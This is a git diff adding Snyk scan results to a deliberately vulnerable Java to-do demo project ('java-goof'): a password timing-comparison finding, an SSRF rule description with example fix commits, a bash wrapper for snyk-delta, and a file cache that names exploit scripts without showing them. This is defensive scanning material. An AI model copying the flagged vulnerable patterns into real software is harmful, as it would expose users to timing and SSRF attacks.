"todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 250, + "endLine": 250, + "startColumn": 17, + "endColumn": 50 + } + } + } + } + ] + } + ] + } + ], + "properties": { + "priorityScore": 617, + "priorityScoreFactors": [ + { + "label": true, + "type": "multipleOccurrence" + }, + { + "label": true, + "type": "hotFileSource" + }, + { + "label": true, + "type": "fixExamples" + } + ], + "isAutofixable": false + } + }, + { + "ruleId": "java/ReturnsPassword", + "ruleIndex": 1, + "level": "warning", + "message": { + "text": "An attacker might be able to detect the value of the password due to the exposure of comparison timing. When the functions Arrays.equals() or String.equals() are called, they will exit earlier if fewer bytes are matched. Use password encoder such as BCrypt for comparing passwords.", + "markdown": "An attacker might be able to detect the value of the password due to the exposure of comparison timing. When the functions Arrays.equals() or String.equals() are called, they will exit earlier if fewer bytes are matched. Use password encoder such as BCrypt for comparing passwords.", + "arguments": [] + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 254, + "endLine": 254, + "startColumn": 17, + "endColumn": 54 + } + } + } + ], + "fingerprints": { + "0": "5a6e18b33f52d656e45141c69fb41d4f9763dad06f518bac9d79f375ee50b600", + "1": "daf8aa0f.ebc140b8.d308627b.9998adc9.dd06b926.31ccdec6.d2f0a140.02370d47.daf8aa0f.ebc140b8.fc7d5400.9998adc9.dd06b926.31ccdec6.d2f0a140.02370d47" + }, + "codeFlows": [ + { + "threadFlows": [ + { + "locations": [ + { + "location": { + "id": 0, + "physicalLocation": { + "artifactLocation": { + "uri": "todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java", + "uriBaseId": "%SRCROOT%" + }, + "region": { + "startLine": 254, + "endLine": 254, + "startColumn": 17, + "endColumn": 54 + } + } + } + } + ] + } + ] + } + ], + "properties": { + "priorityScore": 617, + "priorityScoreFactors": [ + { + "label": true, + "type": "multipleOccurrence" + }, + { + "label": true, + "type": "hotFileSource" + }, + { + "label": true, + "type": "fixExamples" + } + ], + "isAutofixable": false + } + } + ], + "properties": { + "coverage": [ + { + "isSupported": true, + "lang": "HTML", + "files": 10, + "type": "SUPPORTED" + }, + { + "isSupported": true, + "lang": "Java", + "files": 36, + "type": "SUPPORTED" + }, + { + "isSupported": true, + "lang": "XML", + "files": 14, + "type": "SUPPORTED" + }, + { + "isSupported": true, + "lang": "Python", + "files": 2, + "type": "SUPPORTED" + }, + { + "isSupported": true, + "lang": "JavaScript", + "files": 6, + "type": "SUPPORTED" + }, + { + "isSupported": true, + "lang": "Java Server Pages", + "files": 12, + "type": "SUPPORTED" + } + ] + } + } + ] +} diff --git a/test.json b/test.json new file mode 100644 index 0000000000..34a147d0cb --- /dev/null +++ b/test.json @@ -0,0 +1,511 @@ +{ + "id": "python/Ssrf", + "name": "Ssrf", + "shortDescription": { + "text": "Server-Side Request Forgery (SSRF)" + }, + "defaultConfiguration": { + "level": "warning" + }, + "help": { + "markdown": "\n## Details\nIn a server-side request forgery attack, a malicious user supplies a URL (an external URL or a network IP address such as 127.0.0.1) to the application's back end. The server then accesses the URL and shares its results, which may include sensitive information such as AWS metadata, internal configuration information, or database contents with the attacker. Because the request comes from the back end, it bypasses access controls, potentially exposing information the user does not have sufficient privileges to receive. The attacker can then exploit this information to gain access, modify the web application, or demand a ransom payment.\n\n## Best practices for prevention\n* Blacklists are problematic and attackers have numerous ways to bypass them; ideally, use a whitelist of all permitted domains and IP addresses.\n* Use authentication even within your own network to prevent exploitation of server-side requests.\n* Implement zero trust and sanitize and validate all URL and header data returning to the server from the user. Strip invalid or suspect characters, then inspect to be certain it contains a valid and expected value.\n* Ideally, avoid sending server requests based on user-provided data altogether.\n* Ensure that you are not sending raw response bodies from the server directly to the client. Only deliver expected responses.\n* Disable suspect and exploitable URL schemas. Common culprits include obscure and little-used schemas such as `file://`, `dict://`, `ftp://`, and `gopher://`.", + "text": "" + }, + "properties": { + "tags": [ + "python", + "Ssrf", + "Security", + "SourceNonServer", + "SourceLocalEnv", + "SourceCLI", + "Taint" + ], + "categories": [ + "Security" + ], + "exampleCommitFixes": [ + { + "commitURL": "https://github.com/ARM-software/vulkan_best_practice_for_mobile_developers/commit/23ad832af741f0354949a72e6c6f799eb9d2bace?diff=split#diff-7efee2ee97af01f846ed5818e84c955c51bd8efe06588e0dfa341c68966d945fL-1", + "lines": [ + { + "line": " parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=\"Downloads and unpacks assets\")\n", + "lineNumber": 31, + "lineChange": "removed" + }, + { + "line": " parser.add_argument(\"zip_url\", action=\"store\", type=str, help=\"URL of the assets package\")\n", + "lineNumber": 32, + "lineChange": "removed" + }, + { + "line": " args = parser.parse_args()\n", + "lineNumber": 33, + "lineChange": "removed" + }, + { + "line": " url = \"https://github.com/ARM-software/vulkan_best_practice_for_mobile_developers/releases/download/v1.1.2/scenes.zip\"\n", + "lineNumber": 31, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 34, + "lineChange": "none" + }, + { + "line": " try:\n", + "lineNumber": 35, + "lineChange": "none" + }, + { + "line": " request = requests.get(args.zip_url, stream=True)\n", + "lineNumber": 36, + "lineChange": "removed" + }, + { + "line": " request = requests.get(url, stream=True)\n", + "lineNumber": 34, + "lineChange": "added" + } + ] + }, + { + "commitURL": "https://github.com/yask123/Instant-Movie-Streamer/commit/0b66df24286da3df144b8874cb40db4c6ddf5c6c?diff=split#diff-92c6c2b7103c0f894cf5a1c09b289b8251c1c260eb20cb9027189a2a0eee5d99L-1", + "lines": [ + { + "line": "def get_magnet_link(movie_name = 'harry potter'):\n", + "lineNumber": 32, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 33, + "lineChange": "added" + }, + { + "line": " URL = 'https://www.skytorrents.in/search/all/ed/1/?q='+movie_name.replace(' ', '+')\n", + "lineNumber": 34, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 39, + "lineChange": "none" + }, + { + "line": "def get_torrent_url(search_url):\n", + "lineNumber": 40, + "lineChange": "removed" + }, + { + "line": " \"\"\"Grabs the best matched torrent URL from the search results.\"\"\"\n", + "lineNumber": 41, + "lineChange": "removed" + }, + { + "line": " search_request_response = requests.get(search_url, verify=False)\n", + "lineNumber": 42, + "lineChange": "removed" + }, + { + "line": " soup = BeautifulSoup(search_request_response.text, 'html.parser')\n", + "lineNumber": 43, + "lineChange": "removed" + }, + { + "line": " movie_page = 'https://kat.cr' + (soup.find_all(\"a\", class_=\"cellMainLink\")[0].get('href'))\n", + "lineNumber": 44, + "lineChange": "removed" + }, + { + "line": " resp = requests.get(URL)\n", + "lineNumber": 36, + "lineChange": "added" + }, + { + "line": " soup = BeautifulSoup(resp.text, 'html.parser')\n", + "lineNumber": 37, + "lineChange": "added" + } + ] + }, + { + "commitURL": "https://github.com/hacktoolkit/django-htk/commit/01df728743a36721d7659247a3e3b9907133ffee?diff=split#diff-eec36e337287f60f4a26ec5ed80b77d0234217d0de7dab8846fe3a39048cef9fL-1", + "lines": [ + { + "line": "GOOGLE_GEOCODING_API_BASE_URL = 'https://maps.googleapis.com/maps/api/geocode/%(format)s?sensor=%(sensor)s&'\n", + "lineNumber": 23, + "lineChange": "removed" + }, + { + "line": "GOOGLE_GEOCODING_API_GEOCODE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'address=%(address)s'\n", + "lineNumber": 24, + "lineChange": "removed" + }, + { + "line": "GOOGLE_GEOCODING_API_REVERSE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'latlng=%(latlng)s'\n", + "lineNumber": 25, + "lineChange": "removed" + }, + { + "line": "from htk.utils import htk_setting\n", + "lineNumber": 23, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 24, + "lineChange": "added" + }, + { + "line": "GOOGLE_GEOCODING_API_URL = 'https://maps.googleapis.com/maps/api/geocode/json'\n", + "lineNumber": 25, + "lineChange": "added" + }, + { + "line": "#GOOGLE_GEOCODING_API_BASE_URL = 'https://maps.googleapis.com/maps/api/geocode/%(format)s?sensor=%(sensor)s&'\n", + "lineNumber": 26, + "lineChange": "added" + }, + { + "line": "#GOOGLE_GEOCODING_API_GEOCODE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'address=%(address)s'\n", + "lineNumber": 27, + "lineChange": "added" + }, + { + "line": "#GOOGLE_GEOCODING_API_REVERSE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'latlng=%(latlng)s'\n", + "lineNumber": 28, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 29, + "lineChange": "none" + }, + { + "line": "class Usage(Exception):\n", + "lineNumber": 30, + "lineChange": "none" + }, + { + "line": " def __init__(self, msg):\n", + "lineNumber": 31, + "lineChange": "none" + }, + { + "line": " self.msg = msg\n", + "lineNumber": 32, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 33, + "lineChange": "none" + }, + { + "line": "def main(argv = None):\n", + "lineNumber": 34, + "lineChange": "none" + }, + { + "line": " OPT_STR = 'hgr'\n", + "lineNumber": 35, + "lineChange": "none" + }, + { + "line": " OPT_LIST = [\n", + "lineNumber": 36, + "lineChange": "none" + }, + { + "line": " 'help',\n", + "lineNumber": 37, + "lineChange": "none" + }, + { + "line": " 'geocode',\n", + "lineNumber": 38, + "lineChange": "none" + }, + { + "line": " 'resolve',\n", + "lineNumber": 39, + "lineChange": "none" + }, + { + "line": " ]\n", + "lineNumber": 40, + "lineChange": "none" + }, + { + "line": " is_geocode = True\n", + "lineNumber": 41, + "lineChange": "none" + }, + { + "line": " if argv is None:\n", + "lineNumber": 42, + "lineChange": "none" + }, + { + "line": " argv = sys.argv\n", + "lineNumber": 43, + "lineChange": "none" + }, + { + "line": " try:\n", + "lineNumber": 44, + "lineChange": "none" + }, + { + "line": " try:\n", + "lineNumber": 45, + "lineChange": "none" + }, + { + "line": " progname = argv[0]\n", + "lineNumber": 46, + "lineChange": "none" + }, + { + "line": " opts, args = getopt.getopt(argv[1:],\n", + "lineNumber": 47, + "lineChange": "none" + }, + { + "line": " OPT_STR,\n", + "lineNumber": 48, + "lineChange": "none" + }, + { + "line": " OPT_LIST)\n", + "lineNumber": 49, + "lineChange": "none" + }, + { + "line": " except getopt.error, msg:\n", + "lineNumber": 50, + "lineChange": "none" + }, + { + "line": " raise Usage(msg)\n", + "lineNumber": 51, + "lineChange": "none" + }, + { + "line": " # process options\n", + "lineNumber": 52, + "lineChange": "none" + }, + { + "line": " for o, a in opts:\n", + "lineNumber": 53, + "lineChange": "none" + }, + { + "line": " if o in ('-h', '--help'):\n", + "lineNumber": 54, + "lineChange": "none" + }, + { + "line": " print __doc__\n", + "lineNumber": 55, + "lineChange": "none" + }, + { + "line": " sys.exit(0)\n", + "lineNumber": 56, + "lineChange": "none" + }, + { + "line": " elif o in ('-g', '--geocode'):\n", + "lineNumber": 57, + "lineChange": "none" + }, + { + "line": " is_geocode = True\n", + "lineNumber": 58, + "lineChange": "none" + }, + { + "line": " elif o in ('-r', '--resolve'):\n", + "lineNumber": 59, + "lineChange": "none" + }, + { + "line": " is_geocode = False\n", + "lineNumber": 60, + "lineChange": "none" + }, + { + "line": " if is_geocode and len(args) == 1:\n", + "lineNumber": 61, + "lineChange": "none" + }, + { + "line": " address = args[0]\n", + "lineNumber": 62, + "lineChange": "none" + }, + { + "line": " latitude, longitude = get_latlng(address)\n", + "lineNumber": 63, + "lineChange": "none" + }, + { + "line": " print '%s,%s' % (latitude, longitude,)\n", + "lineNumber": 64, + "lineChange": "none" + }, + { + "line": " elif not is_geocode and len(args) == 2:\n", + "lineNumber": 65, + "lineChange": "none" + }, + { + "line": " latitude = args[0]\n", + "lineNumber": 66, + "lineChange": "none" + }, + { + "line": " longitude = args[1]\n", + "lineNumber": 67, + "lineChange": "none" + }, + { + "line": " address = reverse_geocode(latitude, longitude)\n", + "lineNumber": 68, + "lineChange": "none" + }, + { + "line": " print address\n", + "lineNumber": 69, + "lineChange": "none" + }, + { + "line": " else:\n", + "lineNumber": 70, + "lineChange": "none" + }, + { + "line": " raise Usage('Incorrect arguments')\n", + "lineNumber": 71, + "lineChange": "none" + }, + { + "line": " \n", + "lineNumber": 72, + "lineChange": "none" + }, + { + "line": " except Usage, err:\n", + "lineNumber": 73, + "lineChange": "none" + }, + { + "line": " print >> sys.stderr, err.msg\n", + "lineNumber": 74, + "lineChange": "none" + }, + { + "line": " print >> sys.stderr, \"for help use --help\"\n", + "lineNumber": 75, + "lineChange": "none" + }, + { + "line": " return 3.14159\n", + "lineNumber": 76, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 77, + "lineChange": "none" + }, + { + "line": "def get_latlng(address):\n", + "lineNumber": 78, + "lineChange": "none" + }, + { + "line": " address_query = urllib.quote(address, '')\n", + "lineNumber": 76, + "lineChange": "none" + }, + { + "line": " \n", + "lineNumber": 77, + "lineChange": "none" + }, + { + "line": " values = {\n", + "lineNumber": 78, + "lineChange": "none" + }, + { + "line": " 'format' : 'json',\n", + "lineNumber": 79, + "lineChange": "none" + }, + { + "line": "'sensor' : 'false',\n", + "lineNumber": 80, + "lineChange": "none" + }, + { + "line": "'address' : address_query,\n", + "lineNumber": 81, + "lineChange": "none" + }, + { + "line": " }\n", + "lineNumber": 82, + "lineChange": "none" + }, + { + "line": " url = GOOGLE_GEOCODING_API_GEOCODE_URL % values\n", + "lineNumber": 83, + "lineChange": "removed" + }, + { + "line": " response = requests.get(url)\n", + "lineNumber": 84, + "lineChange": "removed" + }, + { + "line": " key = htk_setting('HTK_GOOGLE_GEOCODING_API_KEY', None)\n", + "lineNumber": 83, + "lineChange": "added" + }, + { + "line": " if key:\n", + "lineNumber": 84, + "lineChange": "added" + }, + { + "line": " params['key'] = key\n", + "lineNumber": 85, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 86, + "lineChange": "added" + }, + { + "line": " response = requests.get(GOOGLE_GEOCODING_API_URL, params=params)\n", + "lineNumber": 87, + "lineChange": "added" + } + ] + } + ], + "exampleCommitDescriptions": [], + "precision": "very-high", + "repoDatasetSize": 4, + "cwe": [ + "CWE-918" + ] + } +} diff --git a/test.sh b/test.sh new file mode 100755 index 0000000000..3a6fa0ce7a --- /dev/null +++ b/test.sh @@ -0,0 +1,85 @@ +#!/bin/bash + +# Call this script as you would call snyk test | snyk-delta, minus the --all-projects and --json flags +# This is an interim fix until snyk-delta supports all projects itself (or snyk supports a --new flag) +# example: /bin/bash snyk_delta_all_projects.sh --severity=high --exclude=tests,resources -- -s config.yaml +# runs snyk test --all-projects --json $* +# requires jq to be installed + +set -euo pipefail + +exit_code=0 +snyk_test_json='' +formatted_json='' +args=("$*") + +run_snyk_delta () { + # add in any other arguments you would like to use + snyk-delta +} + +run_snyk_test () { + echo "Running: snyk test --all-projects --json" $args + local snyk_exit_code=0 + { + + snyk_test_json=`snyk test --all-projects --json $args` + + } || { + snyk_exit_code=$? + if [ $snyk_exit_code -eq 2 ] + then + echo 'snyk test command was not successful, retry with -d to see more information' + exit 2 + fi + } + + +} + +format_snyk_test_output() { + echo "Procesing snyk test --json output" + { + formatted_json=`echo $snyk_test_json | jq -r 'if type=="array" then .[] else . end | @base64'` + } || { + echo 'failed to process snyk-test result' + exit 2 + } +} + + +####### +# 1. run snyk test +run_snyk_test + +# 2. format results to support single & multiple results returned +format_snyk_test_output + +# 3. call snyk-delta for each result +for test in `echo $formatted_json`; do + single_result="$(echo ${test} | base64 -d)" # use "base64 -d -i" on Windows, which will ignore any "gardage" characters echoing may add + project_name="$(echo ${single_result} | jq -r '.displayTargetFile')" + echo 'Processing: ' ${project_name} + if echo ${single_result} | run_snyk_delta + then + project_exit_code=$? + echo 'Finished processing' + else + project_exit_code=$? + if [ $project_exit_code -gt 1 ] + then + echo 'snyk-delta encountered an error, retrying.' + echo ${single_result} | run_snyk_delta + fi + echo 'Finished processing' + fi + + if [ $project_exit_code -gt $exit_code ] + then + exit_code=$project_exit_code + fi + echo "Project: ${project_name} | Exit code: ${project_exit_code}" +done + +echo "Overall exit code for snyk-delta-all-projects.sh: ${exit_code}" +exit $exit_code diff --git a/test2.json b/test2.json new file mode 100644 index 0000000000..1652bc2a7d --- /dev/null +++ b/test2.json @@ -0,0 +1,108 @@ +{ + "vulnerabilities": [], + "ok": true, + "dependencyCount": 0, + "org": "austin.doll", + "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\nexclude:\n global:\n - todolist-goof/exploits/zip-slip.py\n", + "isPrivate": true, + "licensesPolicy": { + "severities": {}, + "orgLicenseRules": { + "AGPL-1.0": { + "licenseType": "AGPL-1.0", + "severity": "high", + "instructions": "" + }, + "AGPL-3.0": { + "licenseType": "AGPL-3.0", + "severity": "high", + "instructions": "" + }, + "Artistic-1.0": { + "licenseType": "Artistic-1.0", + "severity": "medium", + "instructions": "" + }, + "Artistic-2.0": { + "licenseType": "Artistic-2.0", + "severity": "medium", + "instructions": "" + }, + "CDDL-1.0": { + "licenseType": "CDDL-1.0", + "severity": "medium", + "instructions": "" + }, + "CPOL-1.02": { + "licenseType": "CPOL-1.02", + "severity": "high", + "instructions": "" + }, + "EPL-1.0": { + "licenseType": "EPL-1.0", + "severity": "medium", + "instructions": "" + }, + "GPL-2.0": { + "licenseType": "GPL-2.0", + "severity": "high", + "instructions": "" + }, + "GPL-3.0": { + "licenseType": "GPL-3.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.0": { + "licenseType": "LGPL-2.0", + "severity": "medium", + "instructions": "" + }, + "LGPL-3.0": { + "licenseType": "LGPL-3.0", + "severity": "medium", + "instructions": "" + }, + "MPL-1.1": { + "licenseType": "MPL-1.1", + "severity": "medium", + "instructions": "" + }, + "MPL-2.0": { + "licenseType": "MPL-2.0", + "severity": "medium", + "instructions": "" + }, + "MS-RL": { + "licenseType": "MS-RL", + "severity": "medium", + "instructions": "" + }, + "SimPL-2.0": { + "licenseType": "SimPL-2.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.1": { + "licenseType": "LGPL-2.1", + "severity": "medium", + "instructions": "" + } + } + }, + "packageManager": "maven", + "projectId": "6bb333cc-0ffb-4f07-924f-c128d54c1c12", + "ignoreSettings": { + "adminOnly": false, + "reasonRequired": true, + "disregardFilesystemIgnores": false + }, + "summary": "No known vulnerabilities", + "filesystemPolicy": true, + "uniqueCount": 0, + "projectName": "io.github.snyk:java-goof", + "foundProjectCount": 7, + "displayTargetFile": "pom.xml", + "hasUnknownVersions": false, + "path": "/Users/austindoll/Documents/GitHub/java-goof" +} diff --git a/todolist-goof/.dccache b/todolist-goof/.dccache new file mode 100644 index 0000000000..290fe3d023 --- /dev/null +++ b/todolist-goof/.dccache @@ -0,0 +1 @@ +{"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/pom.xml":[3789,1707749068011.1064,"ca348a55eee0c2c6b76fd19daa5001a2ae8a74f7584132d07f7fcc5b9d81a1cd"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/web.xml":[163602,1707749068031.4702,"14fbfdf6f89135f18a36425670fc0549a5919415639b72448f1301858000e7c1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/exploits/zip-slip.py":[408,1707749068007.4468,"a818fc2527938e1da045c776d60ba3816f6895a2cc3c704d533f6a18376bebf1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/pom.xml":[3597,1707749068017.0205,"09fed335bb1308ee3b405e6eb7cee510fc64e96527c59e933912d047ee60dc0d"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/pom.xml":[3468,1707749068023.351,"61ef52abd4ad31c5cbdf91d0ed533c96dd7fb2d6bebdabf4a625a4fd6fc80c55"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/pom.xml":[2430,1707749068020.6174,"71757d958b575723f0010daa01d6e579df879a16c7160f779c0f92102af5b894"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/exploits/tomcat-rce/exploit.py":[6127,1707749068006.9976,"1044e4d9d2f0035f2a1ceb0d9cb6f2b290917ee311d7e605352b4d982547bb98"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/about.html":[4688,1707749068013.4434,"e0396d1712516cf3a477e7143c8be27c608da18c6929d07d4dfae0043ecf5f51"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/account.html":[10141,1707749068013.62,"7bfc9a8f3e554519afa0483021bda4f0e1340444e41579d03cf42b9e73a445ec"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/createTodo.html":[5494,1707749068013.7979,"7fb7501b2dfc287ea26b53e44154eb91f1256a347d9d578ca6a34b100e6b4299"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/home.html":[16033,1707749068013.969,"20d27904c27c8a764dbdf142006895805d3d27b4b428e63cdcea81450b561031"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/index.html":[2636,1707749068014.067,"104bbef8fe73eb729f086317f1c7b16e4ead3eecb1aa7431728c9bba4a59e02e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/login-error.html":[3404,1707749068014.147,"92e9656c27429357777f74cb85c7446168962ea38ff4cc906c02696694e0f30b"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/login.html":[3201,1707749068014.241,"a547c1172ac5214ec936a5bcfc2f7ae8375eca78e19a86c58add1d0a37262a3f"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/register.html":[4215,1707749068014.373,"1eb6f41a808801f5881fc573e7110e6ad682ca17d8126609025e73e67a69b2a8"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/searchTodo.html":[11497,1707749068014.504,"0dd8ffc0a703279252eff55566765326701d297c34bc4d721912b6c6224d81a5"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/updateTodo.html":[6468,1707749068016.7961,"aeea0bd71e519e04d3aa60cfe27868803f07bb19f4c9212fb90d1bf0ff6af714"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/resources/struts.xml":[8029,1707749068025.5425,"34c773e0dfa168a8d9947cf3e0fd13282fde503cadd3dd959b72c2cae8afe72e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/static/js/bootstrap-datepicker.js":[11683,1707749068016.2554,"b03662f2b02be2cb7bcc3c387ef24a950414103b056d8d6c6ff461b8f4d7b01c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/static/js/bootstrap.min.js":[28631,1707749068016.3838,"a515a82292b34bdde3447113634d5d496039ffd4d6a0c7382586f3c24e582645"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/static/js/jquery-1.10.2.min.js":[93107,1707749068016.646,"0ba081f546084bd5097aa8a73c75931d5aa1fc4d6e846e53c21f98e6a1509988"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/persistence.xml":[766,1707749068019.1663,"5fd1eca212d0b30f490d98338bf56550394060c0c4342a1bcf6ad6643b787428"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/web.xml":[1316,1707749068028.074,"e3525f343fa0a2fe1f3dfea1bcddb69649d71eae9bda52ae2b118113f6cb574a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/spring/application-context.xml":[868,1707749068019.3025,"b60c87281e4808b5d0f12a314c51d7cd44dd0a057a2378f925deb2e7b13f3d5e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/spring/infrastructure-context.xml":[2335,1707749068019.3816,"c9a996e921025ae765b092e5739a03af219548a902852670444144d09d58f194"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/about.jsp":[1868,1707749068025.8013,"eedab2c226de89d4d4d85f9ed044d628cf6070e616ad29e9f03f83752656a691"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/error.jsp":[653,1707749068026.3748,"6106cdf7b628fa2aac9a04a3d268be6f60f3d5dc1ab9a1d336f54bbbd74f6174"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/index.jsp":[1861,1707749068026.4595,"01dc1dd68bb95ee1f99ef396b6fcb8a098c5f911d581a4885a8be4fc87ebd91a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/static/js/bootstrap-datepicker.js":[11683,1707749068030.258,"b03662f2b02be2cb7bcc3c387ef24a950414103b056d8d6c6ff461b8f4d7b01c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/static/js/bootstrap.min.js":[28631,1707749068030.3862,"a515a82292b34bdde3447113634d5d496039ffd4d6a0c7382586f3c24e582645"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/static/js/jquery-1.10.2.min.js":[93107,1707749068031.0234,"0ba081f546084bd5097aa8a73c75931d5aa1fc4d6e846e53c21f98e6a1509988"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/create.jsp":[2544,1707749068026.6067,"b2b33b8980b011d4968751de2f7a9850115f7ab9a56bb49e7dea24fc3c973e23"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/search.jsp":[4454,1707749068026.7534,"1cb05693027f12118e9512a3e01a3f921b84f59e00a77ce94c059acf9db13dc2"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/update.jsp":[3605,1707749068027.0662,"c449f35943ee90d512149c3d1b26347c3750c1859fc8c537b4f0d10606ba4700"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/upload.jsp":[1466,1707749068027.223,"0597d3a625750805184ddeccbe1f494128c4964ff6239e547159c624b7e59e0a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/account.jsp":[7316,1707749068027.4456,"3a06613691bab220ee216c8e5774adbedd84ced7e595109291293c3ad28ed49c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/files.jsp":[1585,1707749068027.5571,"461382d325567c4c669cef5176148d9e14be127fc4793652542612e372eb5432"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/home.jsp":[4828,1707749068027.7083,"b0cd89cd2c9d5a9dacb4e285ff924078315d9c937d6ea1a3605a538bbe05b0eb"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/login.jsp":[2108,1707749068027.8154,"fef8f3f5c975a6a4912b5708b8b5cd3409b6d749569f7eca1d7b9f7793f8766a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/register.jsp":[3249,1707749068027.9233,"5495c3acf8521dc6e68b66fb1e68ce835316d11cebf02d73e2407b23dd5f1dc9"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/Statics.java":[302,1707749068017.4575,"faf8ae30c8c00074f924d68192efea8ddf173d772e3857987eebc8474af8a025"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/test/java/io/github/todolist/core/TodoServiceTest.java":[2061,1707749068020.2898,"97a4d9a387a2b063bed68c376282b7844fd77e1a1ab6bfa9f566fb6c66815ab3"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/test/java/io/github/todolist/core/UserServiceTest.java":[1911,1707749068020.393,"f08674cb5b00b45c4f2c0f5478b62a8d6da2e610ebf928d95d0f162ccf6b25f1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/Priority.java":[1400,1707749068017.6262,"fbcf56cefa0166697104dc80f3cd9454e0a9ed64f32bf1f51b8ff52c61ade443"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/Todo.java":[5142,1707749068017.7947,"e511ab0dcf0d6d60e2a08912558a03d2f3c2b4246cb374fc899c7375707a8ba6"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/User.java":[2744,1707749068017.8948,"82a4b1757798282d230b769625371b91f2a8892ad313f088159147548a511ce1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/api/TodoRepository.java":[2606,1707749068018.112,"a4b3b4808634f298057a0a480b55a279d4387af97bf285ecaf674dfea43184e1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/api/UserRepository.java":[2317,1707749068018.204,"dd3a1c73160008585fac38906516ee38a4c1ef58b1d8dca35b3c62a160318178"],"/Users/austindoll/Documents/GitHub/java-goof/tod